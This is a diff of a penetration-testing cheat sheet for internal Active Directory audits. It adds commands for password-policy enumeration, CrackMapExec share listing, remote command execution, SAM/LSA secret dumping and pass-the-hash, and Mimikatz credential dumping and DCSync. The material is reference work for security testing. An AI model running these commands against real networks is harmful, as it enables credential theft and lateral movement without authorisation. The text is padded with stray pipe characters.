|
|
@@ -4,12 +4,16 @@ categories: [cheatsheets]
|
|
|
tags: [windows, security, network, AD]
|
|
|
---
|
|
|
|
|
|
-# Internal Network Audit
|
|
|
+ Internal Network Audit
|
|
|
|
|
|
## Low Hanging Fruits
|
|
|
|
|
|
### AD User Details
|
|
|
|
|
|
+* Get domain password policy
|
|
|
+```
|
|
|
+net accounts /domain
|
|
|
+```
|
|
|
* use PowerView to list domain users with more information
|
|
|
- [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
|
|
|
- Admin Account Flag
|
|
|
@@ -18,7 +22,7 @@ tags: [windows, security, network, AD]
|
|
|
- pwdlastset
|
|
|
- description (sometimes used to store passwords)
|
|
|
|
|
|
-* Get accountname & descriptions
|
|
|
+* Get accountname & descriptions (can store interesting information)
|
|
|
```
|
|
|
Get-DomainUser | Select-Object -Properties samaccountname,description
|
|
|
```
|
|
|
@@ -86,7 +90,7 @@ SharpHound.exe -c SessionLoop --MaxLoopTime 24h
|
|
|
sh> responder.py -c config -I eth0
|
|
|
```
|
|
|
|
|
|
-* what triggers llmnr and NetBios broadcasts?
|
|
|
+* what triggers LLMNR, NetBios and WPAD broadcasts?
|
|
|
- If a domain cannot be resolved by DNS (wont work in new browsers)
|
|
|
- Set DNS entries as unprivileged users
|
|
|
- if IPv6 is not configured, it overrules IPv4 (Tool: MITM6)
|
|
|
@@ -114,7 +118,8 @@ sh> responder.py -c config -I eth0
|
|
|
* Tool: CrackMapExec [https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
|
|
* Detailed Wiki Page:
|
|
|
- [https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference](https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference)
|
|
|
-
|
|
|
+* `-p <password>` can be replaced with `-H <hash>` for PtH Attacks
|
|
|
+* CME will print `(pwn3d)` once a user has write access to `C$` or `ADMIN$`
|
|
|
* Enumerating SMB shares and saving ips where SMB signing is disabled
|
|
|
```
|
|
|
sh> cme smb <cidr> --gen-relay-list targets.txt
|
|
|
@@ -125,6 +130,31 @@ SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Sta
|
|
|
SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)�
|
|
|
```
|
|
|
|
|
|
+* Enumerating all shares
|
|
|
+```
|
|
|
+sh> cme smb ips.txt -u <user> -p <pass> --shares
|
|
|
+```
|
|
|
+
|
|
|
+* Code Execution (write access to `C$` or `ADMIN$` is needed)
|
|
|
+```
|
|
|
+sh> cme smb ips.txt -u <user> -p <pass> -[xX] 'whoami'
|
|
|
+```
|
|
|
+
|
|
|
+* Dumping Secrets (write access to `C$` or `ADMIN$` is needed)
|
|
|
+```
|
|
|
+sh> cme smb ips.txt -u <user> -p <pass> --[sam/lsa]
|
|
|
+```
|
|
|
+
|
|
|
+### Mimikatz
|
|
|
+
|
|
|
+* Dropping logonpasswords
|
|
|
+```
|
|
|
+mimikatz "privilege::debug" "sekurlsa::logonpasswords"
|
|
|
+```
|
|
|
+* DCSync (requires GenericAll permissions)
|
|
|
+```
|
|
|
+lsadump::dcsync /domain:<domain> /all /csv
|
|
|
+```
|
|
|
|
|
|
### Tipps: **GenericAll**
|
|
|
|
|
|
@@ -135,11 +165,8 @@ SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WI
|
|
|
- DC Sync + DC Shadow to reset old password
|
|
|
|
|
|
|
|
|
-
|
|
|
## More Advanced Attacks
|
|
|
|
|
|
-TODO
|
|
|
-
|
|
|
### Kerberoasting
|
|
|
|
|
|
### AS-REP Roast
|
|
|
@@ -147,4 +174,3 @@ TODO
|
|
|
### NTLM relaying attack
|
|
|
|
|
|
|
|
|
-
|
Marius Schwarz